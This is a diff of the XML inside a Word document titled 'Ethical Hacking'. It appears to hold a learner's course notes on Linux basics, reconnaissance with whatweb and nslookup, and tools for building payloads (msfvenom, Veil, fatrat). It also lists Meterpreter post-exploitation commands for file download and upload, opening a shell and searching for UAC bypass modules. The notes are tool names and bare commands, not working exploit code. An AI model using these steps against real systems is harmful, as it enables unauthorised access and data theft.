+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p/>
         </w:tc>
@@ -3816,15 +3828,69 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Gaining Access(Viruses, Trojan, Payloads)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Note: msfvenom</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Virustotal.com</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -3832,62 +3898,40 @@
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL: msfvenom -h</w:t>
+            </w:r>
+            <w:r>
+              <w:t>elp or -h</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL:msfvenom -p</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL</w:t>
+            </w:r>
+            <w:r>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: msfvenom –list </w:t>
+            </w:r>
+            <w:r>
+              <w:t>payload</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
         </w:tc>
         <w:tc>
@@ -3912,8 +3956,359 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Veil – generating powershell payload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>apt-get install veil</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL: veil</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use 1</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> or 2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: list</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>CL: use {22} or {Whatever on the screen}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set sleep 20</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {LHOST} generate</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>getuid</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Post Exploitation – Elating Privileges, Extracting Data, Running…</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ----METERPRETER</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>When inside the machine and ready to attack</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL meterpreter</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> &gt; </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: pwd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: dir</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: ls</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve">NOTE: Support </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>windows command</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Some of the command in, when your in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {fileName}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">upload </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{fileName}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t>shell – to execute the file</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Elevated Privileges in the machine</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&gt;search bypassuac – user account control</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">search </w:t>
+            </w:r>
+            <w:r>
+              <w:t>2020</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – </w:t>
+            </w:r>
+            <w:r>
+              <w:t>all modules that can out this year</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
         </w:tc>
         <w:tc>
@@ -4008,6 +4403,119 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="01BB1337"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E3D0380E"/>
+    <w:lvl w:ilvl="0" w:tplc="69FA2FC4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="18262D52"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1AAF4B0"/>
@@ -4096,7 +4604,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24F21451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="033ECDDE"/>
@@ -4208,7 +4716,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3509666A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9CD64556"/>
@@ -4297,7 +4805,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48EF3815"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6668300A"/>
@@ -4386,7 +4894,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="527E7511"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3D007ACE"/>
@@ -4475,7 +4983,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66D8281C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="162256E8"/>
@@ -4565,22 +5073,25 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1830051639">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1548644043">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="92751156">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1548644043">
+  <w:num w:numId="4" w16cid:durableId="390814802">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="92751156">
+  <w:num w:numId="5" w16cid:durableId="1514765802">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="2140680956">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="390814802">
+  <w:num w:numId="7" w16cid:durableId="1634290607">
     <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="1514765802">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="6" w16cid:durableId="2140680956">
-    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -90,6 +90,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -100,7 +101,14 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">(open port 80, </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">open port 80, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -228,9 +236,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo ifconfig</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ifconfig</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
         </w:tc>
@@ -251,8 +269,13 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>pwd – current directory</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -287,12 +310,14 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -390,8 +415,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Virtual Machine msfadmin</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Virtual Machine </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -483,7 +513,15 @@
               <w:t xml:space="preserve">mv </w:t>
             </w:r>
             <w:r>
-              <w:t>– to move file{mv file3.py FOLDERNAME}</w:t>
+              <w:t xml:space="preserve">– to move </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>file{</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>mv file3.py FOLDERNAME}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -500,8 +538,21 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo su – ROOT USER</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -674,11 +725,19 @@
                 <w:highlight w:val="green"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Ping()</w:t>
+              <w:t>Ping(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -695,11 +754,19 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup erertech.com</w:t>
+              <w:t>Nglookup</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -710,6 +777,7 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -722,6 +790,7 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -752,8 +821,13 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Whatweb erertech.com -v</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -788,6 +862,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -800,6 +875,7 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -819,6 +895,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -829,12 +906,19 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">hatweb </w:t>
-            </w:r>
+              <w:t>hatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>erertech.com</w:t>
             </w:r>
             <w:r>
@@ -850,16 +934,24 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
